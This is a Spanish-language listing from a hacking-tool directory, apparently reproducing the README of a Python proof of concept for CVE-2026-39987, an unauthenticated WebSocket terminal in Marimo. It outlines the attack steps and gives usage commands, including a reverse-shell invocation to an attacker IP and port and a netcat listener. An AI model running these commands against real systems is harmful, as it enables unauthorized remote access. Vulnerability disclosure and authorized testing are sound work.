Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-39987_RCE_PoC — Prueba de concepto en Python para CVE-2026-39987, que explota un endpoint de terminal WebSocket no autenticado para lograr ejecución remota de comandos y acceso a reverse shell. | Kitploit
Herramientas/GitHubGitHub/mfahdk/cve-2026-39987_rce_poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubmfahdk/cve-2026-39987_rce_poc

CVE-2026-39987_RCE_PoC

Prueba de concepto en Python para CVE-2026-39987, que explota un endpoint de terminal WebSocket no autenticado para lograr ejecución remota de comandos y acceso a reverse shell.

Ver Repositorio
1hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-39987 — PoC de RCE mediante WebSocket en Marimo

Prueba de concepto para CVE-2026-39987, que demuestra la ejecución remota de comandos a través del endpoint de terminal WebSocket vulnerable.

Aviso legal: Esta PoC está destinada únicamente a pruebas de seguridad autorizadas y uso educativo. Úsala solo contra sistemas que poseas o para los que tengas permiso explícito de prueba.

Descripción

La vulnerabilidad permite a un usuario no autenticado interactuar con el endpoint de terminal WebSocket de la aplicación y ejecutar comandos de forma remota.

La PoC se conecta a:

root@kitploit:~
wss://<target>/terminal/ws

y demuestra la ejecución de comandos a través de la conexión WebSocket.

El objetivo utilizado durante el desarrollo/prueba de esta PoC fue un entorno de laboratorio autorizado de Hack The Box.

Requisitos

  • Python 3
  • websocket-client

Instala la biblioteca requerida:

root@kitploit:~
pip3 install websocket-client

Uso

root@kitploit:~
python3 test.py <domain>

Ejemplo:

root@kitploit:~
python3 test.py somesite.com

La PoC establece la conexión WebSocket y ejecuta un comando de prueba.

Reverse Shell

La PoC también admite una opción de reverse shell:

root@kitploit:~
python3 exploit.py <domain> --reverse-shell <IP> --port <PORT>

Ejemplo:

root@kitploit:~
python3 exploit.py somesite.com --reverse-shell 10.10.14.5 --port 4444

Inicia el listener antes de ejecutar la PoC:

root@kitploit:~
nc -lvnp 4444

Detalles técnicos

La aplicación expone un endpoint de terminal WebSocket sin requerir autenticación.

La PoC:

  1. Establece una conexión WebSocket.
  2. Desactiva la verificación del certificado TLS porque el objetivo del laboratorio utiliza un certificado autofirmado.
  3. Consume el prompt inicial de la terminal.
  4. Envía un comando a través del WebSocket.
  5. Lee la salida resultante de la terminal.

El ws.recv() inicial es importante porque el servidor envía el prompt del shell inmediatamente después de establecer la conexión.

Descargar herramienta